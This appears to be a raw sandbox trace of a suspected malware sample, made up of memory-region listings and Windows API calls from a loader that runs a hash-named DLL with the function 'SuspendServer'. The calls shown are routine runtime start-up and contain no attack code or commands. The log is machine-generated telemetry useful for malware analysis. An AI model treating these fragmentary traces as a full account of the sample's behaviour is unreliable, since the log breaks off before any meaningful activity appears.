"" Region: id = 1289 start_va = 0xa50000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 1294 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1295 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1296 start_va = 0x1e50000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 1297 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1298 start_va = 0x1e50000 end_va = 0x1f0ffff monitored = 0 entry_point = 0x1e70da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1299 start_va = 0x1ff0000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 1300 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 1306 start_va = 0x1e50000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 1307 start_va = 0x2000000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 1308 start_va = 0x2200000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1311 start_va = 0x2600000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1312 start_va = 0x2e00000 end_va = 0x3dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 1453 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 1455 start_va = 0x3dd0000 end_va = 0x4106fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2002 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2003 start_va = 0x4110000 end_va = 0x43a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2029 start_va = 0x4110000 end_va = 0x425afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2058 start_va = 0x4110000 end_va = 0x42d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2081 start_va = 0x4110000 end_va = 0x569ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2161 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2167 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2168 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2169 start_va = 0x4110000 end_va = 0x42defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2180 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2181 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2182 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2187 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2189 start_va = 0x4110000 end_va = 0x426efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2196 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Thread: id = 33 os_tid = 0xad8 [0107.164] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0107.164] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0107.164] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0107.164] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0107.164] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0107.165] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0107.165] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0107.165] GetProcessHeap () returned 0x530000 [0107.165] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0107.165] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0107.165] GetLastError () returned 0x7e [0107.165] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0107.166] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0107.166] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c8) returned 0x53c300 [0107.166] SetLastError (dwErrCode=0x7e) [0107.166] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1200) returned 0x543450 [0107.168] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0107.168] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0107.168] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0107.168] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0107.168] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=SuspendServer" [0107.168] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=SuspendServer" [0107.168] GetACP () returned 0x4e4 [0107.168] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x228) returned 0x535360 [0107.168] IsValidCodePage (CodePage=0x4e4) returned 1 [0107.168] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0107.168] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0107.168] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.168] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0107.168] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0107.168] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.168] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0107.463] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0107.463] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0107.463] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0107.463] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0107.463] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0107.463] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0107.463] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0107.463] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0107.464] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0107.464] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x100) returned 0x542d00 [0107.464] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x16e) returned 0x539a80 [0107.464] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0107.464] GetLastError () returned 0x0 [0107.464] SetLastError (dwErrCode=0x0) [0107.464] GetEnvironmentStringsW () returned 0x544660* [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x9cc) returned 0x545040 [0107.464] FreeEnvironmentStringsW (penv=0x544660) returned 1 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x118) returned 0x539d90 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3e) returned 0x540cf0 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5c) returned 0x530780 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x62) returned 0x534be0 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x78) returned 0x53c6d0 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x62) returned 0x535a20 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x28) returned 0x53b390 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x5405c0 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1a) returned 0x53b3c0 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3a) returned 0x540020 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x62) returned 0x534950 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2a) returned 0x53c750 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x534c50 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1c) returned 0x53b720 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd2) returned 0x535cb0 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x7c) returned 0x533fe0 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3a) returned 0x5407f0 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x90) returned 0x533c10 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x53b990 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x30) returned 0x5349c0 [0107.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x36) returned 0x535a90 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c) returned 0x5400c0 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x52) returned 0x538fa0 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c) returned 0x5401b0 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd6) returned 0x5355f0 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x5320c0 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1e) returned 0x53b3f0 [0107.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2c) returned 0x532100 